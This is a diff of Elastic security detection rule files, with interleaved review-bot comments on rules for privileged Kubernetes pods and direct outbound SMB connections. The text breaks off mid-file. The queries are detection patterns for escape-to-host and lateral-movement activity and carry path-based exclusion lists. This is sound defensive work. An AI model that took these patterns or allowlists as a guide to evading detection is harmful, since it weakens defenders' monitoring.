a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_202.json 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json new file mode 100644 index 00000000000..c2ade88ab0c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7908cac-337a-4f38-b50d-5eeb78bdb531_203.json 
@@ -0,0 +1,107 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.",
+ "false_positives": [
+ "By default a container is not allowed to access any devices on the host, but a \"privileged\" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. An administrator may want to run a privileged container to use operating system administrative capabilities such as manipulating the network stack or accessing hardware devices from within the cluster. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\""
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Privileged Pod Created",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.objectRef.resource:pods\n and kubernetes.audit.verb:create\n and kubernetes.audit.requestObject.spec.containers.securityContext.privileged:true\n and not kubernetes.audit.requestObject.spec.containers.image: (\"docker.elastic.co/beats/elastic-agent:8.4.0\")\n",
+ "references": [
+ "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF",
+ "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.image",
+ "type": "text"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.requestObject.spec.containers.securityContext.privileged",
+ "type": "boolean"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "c7908cac-337a-4f38-b50d-5eeb78bdb531",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1611",
+ "name": "Escape to Host",
+ "reference": "https://attack.mitre.org/techniques/T1611/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1610",
+ "name": "Deploy Container",
+ "reference": "https://attack.mitre.org/techniques/T1610/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "c7908cac-337a-4f38-b50d-5eeb78bdb531_203",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json
index 51195b5b419..e394d750166 100644
--- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_104.json
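Review bot: The `false_positives` text in this new rule file tells analysts to build exceptions on `kubernetes.audit.requestObject.spec.container.image`, but the `query` and `required_fields` in the same file use `kubernetes.audit.requestObject.spec.containers.image`, so an exception written as documented would target a field the rule's data does not carry; the text should read `\"kubernetes.audit.requestObject.spec.containers.image\"`. The `query` also embeds an allowlist of a single pinned tag (`docker.elastic.co/beats/elastic-agent:8.4.0`) inside the rule itself, which will re-fire on every agent upgrade and keys on a request-supplied image string rather than a verified digest, so it reads better as a rule exception and should be documented as noise reduction rather than a trust boundary. `note` is an empty string for a medium-severity rule mapped to T1611 Escape to Host; a short triage guide covering the requesting user and service account, the target namespace, whether `hostPID`/`hostNetwork` were requested alongside `privileged`, and whether the image is a known digest would give responders a starting point.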
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json index 9c2392a80f3..d6eadd27d4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_105.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json index 4adc2ed99a7..240a3699810 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_106.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json index b46ad7cac2b..20af9a95147 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_107.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json index 2c6b34cf600..4049f54c566 100644 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_108.json 
@@ -65,7 +65,7 @@ ], "risk_score": 73, "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json index 280109c86f8..2562e741539 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json index ee715fa984d..ec8b4e943c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json index 9eac17dd853..d4fde015e1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_104.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json index 4840e195d22..2f3749777ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_105.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json index a4513f90b2a..56de53418ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_100.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json index 5adb1513954..24f21bc5179 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json index e924a05efb7..fe5e18cb870 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_102.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json index a348ddc01d5..f48821a3478 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/c82b2bd8-d701-420c-ba43-f11a155b681a_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json index a6a8139a385..98471a6e4f6 100644 --- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_104.json 
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Direct Outbound SMB Connection",
- "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). 
Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources 
like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.pid != 4 and\n not (process.executable : \"D:\\\\EnterpriseCare\\\\tools\\\\jre.1\\\\bin\\\\java.exe\" and process.args : \"com.emeraldcube.prism.launcher.Invoker\") and\n not (process.executable : \"C:\\\\Docusnap 11\\\\Tools\\\\nmap\\\\nmap.exe\" and process.args : \"smb-os-discovery.nse\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent *\\\\Ranger\\\\SentinelRanger.exe\",\n \"?:\\\\Program Files\\\\Ivanti\\\\Security Controls\\\\ST.EngineHost.exe\",\n \"?:\\\\Program Files (x86)\\\\Fortinet\\\\FSAE\\\\collectoragent.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Azure Advanced Threat Protection Sensor\\\\*\\\\Microsoft.Tri.Sensor.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikService-release-*\\\\AuvikService.exe\",\n \"?:\\\\Program Files\\\\uptime software\\\\uptime\\\\UptimeDataCollector.exe\",\n \"?:\\\\Program Files\\\\CloudMatters\\\\auvik\\\\AuvikAgentService.exe\",\n \"?:\\\\Program Files\\\\Rumble\\\\rumble-agent-*.exe\")]\n [network where host.os.type == \"windows\" and destination.port == 445 and process.pid != 4 and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
 "related_integrations": [
 {
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
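Review bot: The investigation guide carried on the new `+ "note"` line still reads `searching for login events (for example, 4624) to the target host after the registry modification`, yet this rule fires on an outbound SMB connection and inspects no registry keys, so the phrase looks like a carry-over from a registry-focused guide; `after the suspicious SMB connection` would describe the actual pivot point. The same sentence is present in the _105 and _106 hunks of this rule below, and presumably in the _107 hunk that runs past this chunk. Because these JSON files are exported rule versions, the correction belongs in the upstream rule source rather than a hand edit here. Separately, every exclusion in the `query` value keys on the `process.executable` path alone; where the telemetry supports it, pairing a path exclusion with a code-signature condition keeps an allowlisted path from silencing the detection for whatever happens to run from it.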
diff --git a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json
index 1541ab38b45..59cab2e49e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/c82c7d8f-fb9e-4874-a4bd-fd9e3f9becf1_105.json
@@ -13,7 +13,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Direct Outbound SMB Connection",
- "note": "## Triage and analysis\n\n### Investigating Direct Outbound SMB Connection\n\nThis rule looks for unexpected processes making network connections over port 445. Windows file sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel (PID 4). Occurrences of non-system processes using this port can indicate port scanners, exploits, and tools used to move laterally on the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during 